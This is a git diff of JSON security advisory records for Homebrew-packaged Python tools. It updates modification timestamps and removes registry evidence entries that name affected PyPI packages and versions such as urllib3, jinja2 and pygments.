b/advisories/BREW-cloudiscovery-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-14343", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-1747.json b/advisories/BREW-cloudiscovery-CVE-2020-1747.json index ca8e8167ab..89a8f229e5 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-1747.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-1747", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-26137.json b/advisories/BREW-cloudiscovery-CVE-2020-26137.json index 9d1dafa589..0b26a2cb40 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-26137.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-26137", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-28493.json b/advisories/BREW-cloudiscovery-CVE-2020-28493.json index 68d58848c9..86af794d06 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-28493.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-28493", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-7212.json b/advisories/BREW-cloudiscovery-CVE-2020-7212.json index b3548bcd06..b145c28daf 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-7212.json +++ b/advisories/BREW-cloudiscovery-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2020-7212", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2021-28363.json b/advisories/BREW-cloudiscovery-CVE-2021-28363.json index 7cdc35c226..baa7cacb92 100644 --- a/advisories/BREW-cloudiscovery-CVE-2021-28363.json +++ b/advisories/BREW-cloudiscovery-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2021-28363", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2021-33503.json b/advisories/BREW-cloudiscovery-CVE-2021-33503.json index f3c98ea9b7..2729299b32 100644 --- a/advisories/BREW-cloudiscovery-CVE-2021-33503.json +++ b/advisories/BREW-cloudiscovery-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2021-33503", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2023-43804.json b/advisories/BREW-cloudiscovery-CVE-2023-43804.json index dd2c147080..02d1042cd2 100644 --- a/advisories/BREW-cloudiscovery-CVE-2023-43804.json +++ b/advisories/BREW-cloudiscovery-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2023-43804", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2023-45803.json b/advisories/BREW-cloudiscovery-CVE-2023-45803.json index 5d676d8309..6e81e9e695 100644 --- a/advisories/BREW-cloudiscovery-CVE-2023-45803.json +++ b/advisories/BREW-cloudiscovery-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2023-45803", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-22195.json b/advisories/BREW-cloudiscovery-CVE-2024-22195.json index 7ec55c59e2..b893ed0d00 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-22195.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-22195", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-34064.json b/advisories/BREW-cloudiscovery-CVE-2024-34064.json index 31b347035c..a299464288 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-34064.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-34064", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-37891.json b/advisories/BREW-cloudiscovery-CVE-2024-37891.json index c6a8205972..6f519adb3e 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-37891.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-37891", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-53899.json b/advisories/BREW-cloudiscovery-CVE-2024-53899.json index 1e0a37fdaa..fa0687acd2 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-53899.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-53899.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-53899", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-rqc4-2hc7-8c8v", "BIT-virtualenv-2024-53899", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2024-56326.json b/advisories/BREW-cloudiscovery-CVE-2024-56326.json index 79b79b9795..d7f7088c6c 100644 --- a/advisories/BREW-cloudiscovery-CVE-2024-56326.json +++ b/advisories/BREW-cloudiscovery-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2024-56326", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-27516.json b/advisories/BREW-cloudiscovery-CVE-2025-27516.json index 02ae406c30..a00e5d5eeb 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-27516.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-27516", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-50181.json b/advisories/BREW-cloudiscovery-CVE-2025-50181.json index 3c91331ce9..e0389ac3f9 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-50181.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-50181", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-50182.json b/advisories/BREW-cloudiscovery-CVE-2025-50182.json index f5335ece35..33078abd9c 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-50182.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-50182", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-66418.json b/advisories/BREW-cloudiscovery-CVE-2025-66418.json index 4b83fcd558..ee1c7d9d05 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-66418.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-66418", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-66471.json b/advisories/BREW-cloudiscovery-CVE-2025-66471.json index 47e2cde3a9..6a522ce864 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-66471.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-66471", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-68146.json b/advisories/BREW-cloudiscovery-CVE-2025-68146.json index 8bead7d7df..0329ab2bb6 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-68146.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-68146", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.18.0", - "key": "pkg:pypi/filelock@3.18.0", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2025-69872.json b/advisories/BREW-cloudiscovery-CVE-2025-69872.json index d9ca57ac24..fe86b256f4 100644 --- a/advisories/BREW-cloudiscovery-CVE-2025-69872.json +++ b/advisories/BREW-cloudiscovery-CVE-2025-69872.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2025-69872", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-w8v5-vhqr-4h9v", "CVE-2025-69872", @@ -38,14 +38,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "diskcache", - "subject_version": "5.6.3", - "key": "pkg:pypi/diskcache@5.6.3", - "resource": "diskcache" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-21441.json b/advisories/BREW-cloudiscovery-CVE-2026-21441.json index 83e27af743..84201e16cf 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-21441.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-21441", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-22701.json b/advisories/BREW-cloudiscovery-CVE-2026-22701.json index 75e4812d4a..f7bd96b1c8 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-22701.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-22701", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.18.0", - "key": "pkg:pypi/filelock@3.18.0", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-22702.json b/advisories/BREW-cloudiscovery-CVE-2026-22702.json index a4f1577a39..401bf179e7 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-22702.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-22702.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-22702", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-597g-3phw-6986", "BIT-virtualenv-2026-22702", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2026-44431.json b/advisories/BREW-cloudiscovery-CVE-2026-44431.json index bca9b6f8f6..e10d0121a1 100644 --- a/advisories/BREW-cloudiscovery-CVE-2026-44431.json +++ b/advisories/BREW-cloudiscovery-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2026-44431", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-darker-CVE-2024-21503.json b/advisories/BREW-darker-CVE-2024-21503.json index dd7c94cd04..871b52934f 100644 --- a/advisories/BREW-darker-CVE-2024-21503.json +++ b/advisories/BREW-darker-CVE-2024-21503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-darker-CVE-2024-21503", "published": "2026-08-13T16:42:09Z", - "modified": "2026-08-13T16:42:09Z", + "modified": "2026-09-10T19:04:13Z", "upstream": [ "GHSA-fj7x-q9j7-g6q6", "CVE-2024-21503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "black", - "subject_version": "26.5.1", - "key": "pkg:pypi/black@26.5.1", - "resource": "black" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-darker-CVE-2026-32274.json b/advisories/BREW-darker-CVE-2026-32274.json index c32f5a7fea..bbdaf9e93e 100644 --- a/advisories/BREW-darker-CVE-2026-32274.json +++ b/advisories/BREW-darker-CVE-2026-32274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-darker-CVE-2026-32274", "published": "2026-08-13T16:42:09Z", - "modified": "2026-08-13T16:42:09Z", + "modified": "2026-09-10T19:04:13Z", "upstream": [ "GHSA-3936-cmfr-pm3m", "CVE-2026-32274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "black", - "subject_version": "26.5.1", - "key": "pkg:pypi/black@26.5.1", - "resource": "black" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2015-8557.json b/advisories/BREW-hapless-CVE-2015-8557.json index 0b43c3afa9..6c97a3e8df 100644 --- a/advisories/BREW-hapless-CVE-2015-8557.json +++ b/advisories/BREW-hapless-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2015-8557", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2019-18874.json b/advisories/BREW-hapless-CVE-2019-18874.json index a9fadc991b..1661982651 100644 --- a/advisories/BREW-hapless-CVE-2019-18874.json +++ b/advisories/BREW-hapless-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2019-18874", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "6.1.1", - "key": "pkg:pypi/psutil@6.1.1", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2021-20270.json b/advisories/BREW-hapless-CVE-2021-20270.json index e75bf4dfd3..0d3307d15a 100644 --- a/advisories/BREW-hapless-CVE-2021-20270.json +++ b/advisories/BREW-hapless-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2021-20270", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2021-27291.json b/advisories/BREW-hapless-CVE-2021-27291.json index d1a07eb17a..7e13aa0eff 100644 --- a/advisories/BREW-hapless-CVE-2021-27291.json +++ b/advisories/BREW-hapless-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2021-27291", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2022-40896.json b/advisories/BREW-hapless-CVE-2022-40896.json index 03f462d597..0ebf4fe091 100644 --- a/advisories/BREW-hapless-CVE-2022-40896.json +++ b/advisories/BREW-hapless-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2022-40896", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2023-26302.json b/advisories/BREW-hapless-CVE-2023-26302.json index b0ae2088be..eaa39481ce 100644 --- a/advisories/BREW-hapless-CVE-2023-26302.json +++ b/advisories/BREW-hapless-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2023-26302", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2023-26303.json b/advisories/BREW-hapless-CVE-2023-26303.json index b635817e88..bd0c96c712 100644 --- a/advisories/BREW-hapless-CVE-2023-26303.json +++ b/advisories/BREW-hapless-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2023-26303", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": 